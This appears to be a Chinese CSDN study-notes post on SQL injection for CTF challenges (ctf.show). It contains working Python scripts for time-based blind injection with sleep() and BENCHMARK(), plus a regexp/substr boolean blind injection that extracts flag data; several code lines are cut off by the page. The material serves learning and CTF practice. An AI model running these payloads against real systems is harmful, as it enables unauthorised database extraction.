SQL注入-Day19

最新推荐文章于 2024-07-25 23:12:39 发布
最新推荐文章于 2024-07-25 23:12:39 发布
阅读量132 收藏 1
点赞数
分类专栏: 学习笔记 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kanna_bush_t/article/details/123007308
版权

八、延时注入

8.2 脚本

import requests 
from time import * 
url = "http://7e84a93e-e72e-4fa2-947c-1464bdaf9211.challenge.ctf.show:8080/a 
flag = '' 
i=0 
while True: 
i=i+1 
header = 32 //定义ascii可见字符开始值
tail = 127 // 定义最后的ascii值
while header < tail:
mid = (header + tail) >> 1 //求出中间值
payload = "right((select flag from ctfshow_web.flag),20)"// 构造的sql语
//payload = "select database()" //cvfshow_web
//payload = "select group_concat(table_name) from information_schema.
//payload = "select group_concat(column_name) from information_schema
//print(payload)
data = {
//利用substr函数截取查询结果后的字符转换成ascii码,如果大于中间值,睡0.
'id': f"if(ascii(substr(({payload}),{i},1))>{mid},sleep(0.02),1)
}
try:
s = requests.post(url, data=data, timeout=0.4)//根据正确执行的次数,
//print(s.text)
tail = mid //没有报错执行这句,说明payload语句没有正确执行,没有延时,根
except Exception as e:
header = mid + 1// 正确的情况,会延时
sleep(0.4)
if header != 32:
flag+=chr(header)
else:
break
print(flag)
sleep(2)

8.3 过滤sheep的盲注

MySQL有一个内置的BENCHMARK()函数,可以测试某些特定操作的执行速度。 参 数可以是需
要执行的次数和表达式。 表达式可以是任何的标量表达式,比如返回值 是标量的子查询或者函
数。 该函数可以很方便地测试某些特定操作的性能,比如通过测试可以发现,MDS()函数比
SHAl()函数要快。
对应脚本: 
import requests
url = "http://2e14a567-cf3b-49a8-9297-a6c19c2357db.challenge.ctf.show:8080/a 
flag = '' 
i=0 
while True: 
i=i+1 
header = 32 
tail = 127 
while header < tail: 
mid = (header + tail) >> 1 
payload = "select flagaabc from ctfshow_web.ctfshow_flagxccb" 
//payload = "select database()" 
//payload = "select group_concat(column_name) from information_schema 
//payload = "select group_concat(table_name) from information_schema. 
//print(payload) 
data = {
 'ip': f"1) or if(ascii(substr(({payload}),{i},1))>{mid},benchmar 
'debug': '0' 
}
try:
s = requests.post(url, data=data, timeout=1) 
//print(s.text) 
tail = mid 
except Exception as e: 
header = mid + 1 
if header != 32: 
flag+=chr(header) 
else:
break 
print(flag)

九、regexp 正则匹配

测试:

 9.1 手动

?id=1' and if(substr((select group_concat(table_name) from information_schem 
// 同时爆破 数字 a 和 字母 b

 9.2 脚本

import requests 
import string 
url = "http://xxxxx" 
flagstr=" _{}-" + string.ascii_lowercase + string.digits 
flag = '' 
for i in range(1,45): 
for j in flagstr: 
//payload = f"admin' and if(substr((select group_concat(table_name) f
//payload = f"admin' and if(substr((select group_concat(column_name) 
payload = f"admin' and if(substr((select group_concat(f1ag) from ctf 
data = { 
'username': payload, 'password': '1' 
}
r = requests.post(url, data=data) 
if "密码错误" == r.json()['msg']: 
flag += j 
print(flag) 
if "}" == j: 
exit(0)
break

kanna_bush_t
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java sql构造类库_SqlBuilder
weixin_39780260的博客
03-06 757
软件简介SqlBuilder 是一个Java的类库,它试图帮你避免在Java程序内直接书写SQL查询的痛苦。你只需要使用 SqlBuilder的方法,它就可以帮你生成对应的 SQL 数据库查询语句,例如下面一个SQL语句:String selectQuery = "SELECT " + T1_COL1 + "," + T1_COL2 + "," +T2_COL1 + " FROM " + TABL...
GitHub项目:jkrasnay/sqlbuilder的使用
weixin_30243533的博客
09-21 249
http://www.jianshu.com/p/7f099b8cf5f0 技术选型: 在报表查询时,通常需要做可以动态添加的条件 在老项目中使用的是一种Tcondition的对象分装sql import java.util.HashMap; public class TCondition { private String sql; private Object[] par...
SQL注入-Day14
kanna_bush_t的博客
02-11 2880
一、注入分类 1、依据注入点类型分类 数字类型的注入 字符串类型的注入(单引号、双引号、加括号等) 搜索型注入 2、依据提交方式分类 GET注入 POST注入 COOKIE注入 HTTP头注入(XFF注入、UA注入、REFERER注入) 3、依据获取信息的方式分类 基于布尔的盲注 基于时间的盲注 基于报错的注入 联合查询注入 堆查询注入 (可同时执行多条语句) 二、注入判断 1、工具扫描 常见的网站漏洞扫描工具:AWVS、AppScan、OWASP-ZAP、Nessus 等
SQL注入-Day20
kanna_bush_t的博客
02-19 565
十、异或注入 异或:一种逻辑运算,简言之,相同为假,不同为真,NULL 与任何条件异或结果都为 NULL, mysql 中的符号是 ^ 和 xor。 测试: 常用手段:用于判断所过滤的字符串 ?id=1'^(0) //得到正常的回显页面,由于异或之后得到 真 ?id=1'^(1) //得到错误的回显页面,由于异或之后得到 假 常常用于判断我们所注入的某些字段是否被过滤 ?id=1'^(length('union')>0) 如果 union 已被过滤,那么得到的将会是 .
SQL注入-Day17
kanna_bush_t的博客
02-15 2362
四、union 联合注入(单引号闭合字符型为例) 4.5 查库 ?id=-1' union select 1,(select group_concat(table_name) from information_sch 4.5.1 查某一个库中的表 注意:仅仅是查当前数据库 database() 的表,由于处于当前数据库下,是不能查看其它数据库中数据的。 4.5.2 查列 ?id=-1' union select 1,(select group_concat(column_name.
[0day]通达 OA v11.7 后台 SQL 注入到 RCE1
08-03
通达 OA v11.7 后台 SQL 注入到 RCE 通达 OA v11.7 版本存在后台 SQL 注入漏洞,攻击者可以通过构造特殊的 SQL 语句,绕过安全机制,获取数据库权限,并最终获得远程代码执行(RCE)权限。 知识点一:SQL 注入漏洞...
gamblingmaster2020#0day-1#74cms v5.0.1前台sql注入1
07-25
一、漏洞简介 二、漏洞影响 三、复现过程
python-Day06.rar
04-02
6. **参数化查询**:防止SQL注入,使用预编译语句和参数。 7. **DataFrame与数据库**:如果结合了`pandas`,可能讲解如何将DataFrame对象写入数据库,或者从数据库读取数据到DataFrame。 8. **ORM(对象关系映射)**...
Java-day-14-SQL-:1. Oracle数据库和Java集成(SQL
04-29
在Java编程中,Oracle数据库是常用的数据库管理系统,用于存储和管理大量数据。...在`Java-day-14-SQL--master`这个压缩包文件中,可能包含了一些示例代码和练习,可以帮助你更好地理解和实践这些概念。
mybatis-day02
01-10
SQL语句中,`#{}`内的内容会被替换为预编译的参数值,有效防止SQL注入。 8. **缓存机制** MyBatis提供了一级缓存和二级缓存。一级缓存默认开启,基于SqlSession,同一个SqlSession内的相同查询不会重复执行SQL。...
MySql 主从同步会不会影响到SQL执行速度?
weixin_44892327的博客
07-24 823
作用:负责将主库的二进制日志(binary log)数据传输到从库。工作方式:当从库连接到主库时,主库会为每个连接的从库开启一个 Binlog Dump 线程。这个线程从主库的二进制日志中读取日志记录,并将其发送给从库。Binlog Dump 线程:将二进制日志传输给从库。Binlog Dump GTID 线程(在启用 GTID 模式时):处理 GTID 相关的复制任务。
Sqli-labs-master的21—25通关教程
weixin_68416970的博客
07-25 816
Sqli-labs-master靶场的21、22、23、24、25关教程
SQL进阶:解锁高级特性,深化数据洞察
WayneYalejk的博客
07-24 410
掌握了SQL的基础知识后,进一步探索其高级特性将帮助您更高效地处理复杂数据,深化数据分析的广度和深度。本文将带您领略SQL的高级功能,包括窗口函数、存储过程、触发器以及高级查询技巧等,让您在数据处理的道路上更进一步。通过这两篇文章,读者可以从SQL的基础知识逐步深入到高级特性,全面掌握SQL在数据处理和分析中的强大能力。
sql server 连接报错error 40
只会helloworld的小白啊的博客
07-24 273
Microsoft.Data.SqlClient.SqlException (0x80131904): A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL S
SQL 注入漏洞详解 - Union 注入
Toasten
07-23 1066
SQL 注入即是指 Web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 Web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询从而进一步得到相应的数据信息。
在 Windows 上安装 PostgreSQL
the_beginner的博客
07-24 442
选择额外的安装项(这里我选了一个JDBC驱动包,方便DBeaver访问)安装界面会指定服务程序和库两个路径,可以自己手动选择。官网直接提供exe安装包,没有手动安装的压缩包。
Dav_笔记10:Using SQL Plan Management之4
Dav_2099的博客
07-23 502
数据库清除超过53周未使用的计划,由该计划的SMB中存储的LAST_EXECUTED时间戳标识。您可以使用计划名称(plan_name)
数据库实验:SQL Server创建数据库及基本表
sherry__yuzu的博客
07-24 265
1、掌握使用SQL SERVER Management Studio工具连接数据库引擎;2、掌握使用CREATE TABLE 创建基本表的用法;3、掌握使用ALTER TABLE 修改基本表的用法;4、掌握使用DROP TABLE删除基本表的用法;
spring —— 事务管理器
最新发布
firstgrass的博客
07-25 550
事务管理主要针对数据源进行操作:在数据库方面,通过 TransactionManager 事务管理器进行管理,表明一旦出现错误,该数据源的所有数据全部复原。那么数据库如何判断是否发生了错误呢?这就需要在代码方面,通过 @Transactional 注解管理相应的方法,表示一旦该方法出现错误,那么由该方法调用的数据就要执行回滚。
Pangolin SQL注入测试工具使用指南与技巧
"本文档是关于安全技术工具Pangolin的使用说明,Pangolin是一款专业的SQL注入测试工具,旨在帮助渗透测试人员检测和利用SQL注入漏洞。文档内容包括Pangolin的简介、开始使用的步骤、基本和高级功能介绍、典型案例...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值